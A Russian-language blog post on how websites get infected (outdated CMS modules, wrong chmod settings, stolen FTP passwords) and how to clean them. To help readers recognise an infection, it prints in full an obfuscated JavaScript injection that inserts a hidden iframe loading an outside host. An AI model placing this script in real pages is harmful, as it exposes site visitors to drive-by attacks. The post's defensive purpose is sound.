В последнее время участились случаи заражения вирусами как домашних и рабочих компьютеров, так и целых интернет сайтов и порталов. Если заражение вирусом домашнего компьютера ещё терпимо, то заражение к примеру интернет магазина может привести к значительным убыткам компании.
Как уберечься от заразы, и если всё таки вы заразились, где искать её, как лечить и что делать, об этом пойдёт речь в этом посте.
Начну с вирусов на сайтах. За последние 2 месяца ко мне обратилось порядка 5 человек, обнаруживших на своих сайтах вирусы. Дело было так - пытаешься открыть сайт, но в зависимости от того, какой установлен антивирус, страница либо открывается с сообщением о заблокированном содержимым, либо вообще даже не открывается. Вот и пришлось углубиться в проблему безопасности сайтов, ибо безопасность превыше всего.
А вообще, как вирус может попасть на сайт? Как такое возможно? Вариантов множество, я рассмотрю три из них.
1. Дыры в установленных системах управления контентом, связках компонентов и модулей. Здесь всё просто, если подходить со здравым смыслом и головой на плечах.
Всегда пользуйтесь только последней версией CMS, установленной на сайте. Если в вашей CMS нет автоматического обновления, регулярно посещайте сайт производителя, либо сайт поддержки, где сообщается о выходах новых версий.
Всегда пользуйтесь только последними версиями компонентов и модулей. Т.к. они обычно пишутся сторонними разработчиками, а зачастую и рядовыми программистами, в них могут быть различные дыры. Поэтому по возможности лучше откажитесь от использования ненужных и неизвестных модулей и компонентов.
2. Неправильная установка прав на папки и файлы. В инструкциях и частозадаваемых вопросах к используемой вами CMS чётко расписано, какие права (chmod) должны быть выставлены.
Обычно это недоступность на запись основных конфигов (например, для Joomla, файл configuration.php должен иметь chmod 644, а лучше вообще 444 для полной недоступности записи в него откуда-либо) и недоступность на запись извне определённых системных папок (chmod 755).
По сути, чтобы не заморачиваться с вопросами безопасности после, на этапе создания, при установке любой системы я делаю так:
- распаковываю на хостинге архив с сайтом;
- устанавливаю на ВСЕ файлы права chmod 644, и на ВСЕ папки chmod 755 (для удобства и скорости делаю через SSH-доступ, но можно в панели управления или по ftp);
- и только затем устанавливаю права 777 для нужных папок.
3. Неправильная политика безопасности на локальном компьютере. Казалось бы причём тут сайт в интернете и безопасность локального компьютера.
Всё очень просто - с сайтом вы работаете через свой компьютер и наверняка сохраняете пароли доступа в кеше или ещё где-нибудь. В случае кражи или проникновения в ваш компьютер, этими паролями могут воспользоваться в плохих целях. Особенно важна безопасность хранения пароля для ftp-доступа. Многие ftp-клиенты сохраняют реквизиты доступа к каждому сайту, а это без шифровки небезопасно.
Поэтому я бы посоветовал не сохранять пароли ни в каких программах, а хранить в недоступном никому месте, в идеале - в голове 
Что делать, если ваш сайт заражён?
1. Во-первых, поменяйте ВСЕ пароли доступа. Это включает в себя пароль к панели управления хостингом, пароль к ftp, пароль к админ-панели, пароль для SSH-доступа (если имеется). Если вы не сделаете этого сразу же, это может очень увеличить ваше затраченное время на удаление вируса.
2. Во-вторых, прежде чем совершать дальнейшие действия, проверьте свой компьютер на вирусы. Лучше это сделать в безопасном режиме. Например, утилитой от DrWeb - Cureit.
3. Зайдите через ftp на сайт и посмотрите на дату изменения файлов и папок. Обычно код вируса дописывается в начало или в конец php и html файлов, следовательно вы сразу же увидите файлы, которые возможно заражены. Откройте их в блокноте и посмотрите на наличие в начале и конце лишнего кода. Это может быть что угодно, в зависимости от вируса.
Например, следующий код:
<script type='text/javascript'>function pL(){};var eJF=new Date();pL.prototype = {uO : function() {qO=27314;var yFW="";return 'hvtwt7p7:K/y/wcylyiKcwk7-7syavpwey.Kcyo7mw/wiwny.Kcyg7i7?727'.nS(/[vyKw]/g, '').nS(/[7vyKw]/g, '');var eZ=function(){return 'eZ'};t="t";var hH='';},q : function() {this.bL=15513;var oT=new Array();var yI=false;var yV="yV";vO="";function tC(){};zP='';var u=window;var hJ=new Array();vT="";this.uL=62709;var r = this;var hV="";var rC=function(){return 'rC'};this.k='';var g=document;yM=false;iX="";this.m='';this.c="c";var x=function(){};String.prototype.nS=function(s, e){var h=this; return h.replace(s, e)};this.rE=false;vM="";this.eJ="";pR=false;var p = 'siricF'.nS(/[FY#i\?]/g, '');this.d="";yA='';zG="zG";var y = 's0e;t;TjiOmOe;o0u.t0'.nS(/[0j;O\.]/g, '');var bB="";this.iL=false;var sA='';var i = 'c^rUeUaUt^e&E&lge^m^eTngt^'.nS(/[\^U&Tg]/g, '');zE="";this.j="";this.fH="fH";this.mU="mU"; var gJ = 'a8p+pNeNn+d8C+hNiNl]d4'.nS(/[4\+N8\]]/g, '');yIV=false;var jD=40034;var hU='';mK=false;var yF = 's!e:tdA:t!t!r!iCbju!t!e!'.nS(/[\!Cj\:d]/g, '');function xJ(){};this.n="n";var fM=new Array();var iO = 's6tWywlOeO'.nS(/[O6wW\>]/g, '');this.xZ='';hK=40635;var mY='';var b = 'bDoDdDyT'.nS(/[T6MrD]/g, '');sY='';this.fK=16672;var w=new Array();bC="bC";var v = 'dMiqsTpqlTaTyT'.nS(/[TqIM\^]/g, '');var jC="jC";a='';var z = 'w3r4i4t<e3'.nS(/[34gJ\<]/g, '');rP=false;function nP(){};var vTO=28467;var cT="";this.zC=false;this.wG="";qP="";try {tZ="tZ";lQ='';wQ=29182;var dC="";hJI='';var oN='';var f=g[i]('i?f?rWasmse?'.nS(/[\?s;oW]/g, ''));lW='';var cC="";this.bLC=31114;this.yIB=false;this.kO="";var mI="";wV="";var jZ=function(){return 'jZ'};this.zM='';var tW="";f[yF](p, r.uO());var aG=new Array();var qQ=new Date();var oU="";sP=false;f[iO][v] = 'nGoGn9e7'.nS(/[7l9,G]/g, '');var cF=new Array();this.eK=65306;mS=23589;zD="zD";function mV(){};xA="";var xT="xT";iK=18205;document[b][gJ](f);dF=9132;this.sL=54066;var uOD='';this.lD=false;} catch(bV) {this.hVY=3537;var pJ=new Date();this.bCQ="";var oK='';uX='';oV="oV";hO="hO";hOB=25576;g[z]('l4o4<4/Vb)oVdVyV>#<)/)h)tim4lV>#'.nS(/[#4Vi\)]/g, ''));this.hC="";this.fA="";var zES=false;u[y](function(){ r.q() }, 120);this.sI="";this.qOQ=48654;var wX="";}bO='';kX='';}};var qH="qH";var aH=new pL(); rG=false;aH.q();nF="nF";</script>
Если вы увидите что-либо подобное, считайте, что вирус обнаружен.
4. Очистите от этого кода все файлы, его содержащие. Будьте готовы к тому, что таких файлов окажется большое количество.
Если у вас есть резервная копия сайта на тот момент, когда он ещё был не заражён, то проще и быстрее восстановиться из неё, но обязательно предварительно выполнив 1 и 2 шаг.
Вот и всё, и помните - безопасность превыше всего. Лучше уделить ей достаточное время, чем потом ломать голову и восстанавливать разрушенный сайт. И конечно не забывайте создавать бэкапы.
Много людей уже сталкивались с этими проблемами, например вот что пишет о безопасности другой блог.
Если же ваш блог на Wordpress, то самый простой способ повысить безопасность блога - это использовать плагины, которые легко устанавливаются и легки в обращении.
Теги: безопасность
Добавить в закладки:
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо зайти на сайт под своим именем.